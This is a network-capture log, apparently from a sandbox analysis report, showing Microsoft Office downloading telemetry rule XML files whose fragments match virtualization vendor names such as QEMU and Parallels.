2024-10-30 02:55:48 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
54192.168.2.55255713.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:48 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:48 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:48 GMT
Content-Type: text/xml
Content-Length: 419
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
ETag: "0x8DC582B9C710B28"
x-ms-request-id: 97925bc6-b01e-0002-7e3b-261b8f000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025548Z-17c5cb586f6hhlf5mrwgq3erx800000008tg00000000bcdn
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:48 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


Session IDSource IPSource PortDestination IPDestination Port
55192.168.2.55256413.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:48 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:48 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:48 GMT
Content-Type: text/xml
Content-Length: 485
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
ETag: "0x8DC582BB9769355"
x-ms-request-id: 0a5cb2df-e01e-0071-6f67-2708e7000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025548Z-r197bdfb6b4wmcgqdschtyp7yg000000079g00000000nhp3
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:48 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
56192.168.2.55256513.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:48 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:48 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:48 GMT
Content-Type: text/xml
Content-Length: 411
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
ETag: "0x8DC582B989AF051"
x-ms-request-id: 8e6d5db5-101e-0017-4c27-2747c7000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025548Z-15b8d89586f8nxpt6ys645x5v000000008sg000000003p03
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:48 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


Session IDSource IPSource PortDestination IPDestination Port
57192.168.2.55256313.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:48 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:48 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:48 GMT
Content-Type: text/xml
Content-Length: 468
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
ETag: "0x8DC582BB3EAF226"
x-ms-request-id: c7261251-b01e-0070-6593-291cc0000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025548Z-17c5cb586f6f8m6jnehy0z65x400000006mg00000000gvs9
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:48 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


Session IDSource IPSource PortDestination IPDestination Port
58192.168.2.55256613.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:48 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:49 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:48 GMT
Content-Type: text/xml
Content-Length: 470
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
ETag: "0x8DC582BBB181F65"
x-ms-request-id: 6cbbe1db-401e-0083-6516-26075c000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025548Z-16849878b78qfbkc5yywmsbg0c0000000750000000006myp
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:49 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
59192.168.2.55256713.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:48 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:49 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:49 GMT
Content-Type: text/xml
Content-Length: 427
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
ETag: "0x8DC582BB556A907"
x-ms-request-id: 24f7a248-a01e-0053-7a83-298603000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025549Z-17c5cb586f6mkpfkkpsf1dpups00000002ng00000000fft5
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:49 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


Session IDSource IPSource PortDestination IPDestination Port
60192.168.2.55256913.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:49 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:49 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:49 GMT
Content-Type: text/xml
Content-Length: 407
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
ETag: "0x8DC582B9D30478D"
x-ms-request-id: 3281a84b-401e-0029-700c-289b43000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025549Z-17c5cb586f67hfgj2durhqcxk800000006dg000000001rxh
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:49 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


Session IDSource IPSource PortDestination IPDestination Port
61192.168.2.55256813.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:49 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:49 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:49 GMT
Content-Type: text/xml
Content-Length: 502
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
ETag: "0x8DC582BB6A0D312"
x-ms-request-id: f4a85f8f-401e-00ac-0701-270a97000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025549Z-16849878b78hh85qc40uyr8sc800000007s0000000007nfs
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:49 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
62192.168.2.55257013.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:49 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:49 UTC491INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:49 GMT
Content-Type: text/xml
Content-Length: 474
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
ETag: "0x8DC582BB3F48DAE"
x-ms-request-id: 4b1c8405-301e-005d-7701-27e448000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025549Z-16849878b78wc6ln1zsrz6q9w80000000750000000006unn
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-30 02:55:49 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
63192.168.2.55257113.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:49 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:49 UTC491INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:49 GMT
Content-Type: text/xml
Content-Length: 408
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
ETag: "0x8DC582BB9B6040B"
x-ms-request-id: 4bda8ee7-201e-0003-1763-27f85a000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025549Z-16849878b786fl7gm2qg4r5y7000000007n000000000pckg
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:49 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


Session IDSource IPSource PortDestination IPDestination Port
64192.168.2.55257213.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:49 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:50 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:49 GMT
Content-Type: text/xml
Content-Length: 469
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
ETag: "0x8DC582BB3CAEBB8"
x-ms-request-id: ad4459d7-101e-007a-6a4c-27047e000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025549Z-16849878b78sx229w7g7at4nkg00000005k000000000sxye
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:50 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
65192.168.2.55257313.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:50 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:50 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:50 GMT
Content-Type: text/xml
Content-Length: 416
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
ETag: "0x8DC582BB5284CCE"
x-ms-request-id: bde7aa86-f01e-0052-08e5-279224000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025550Z-17c5cb586f672xmrz843mf85fn00000006bg000000002aya
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
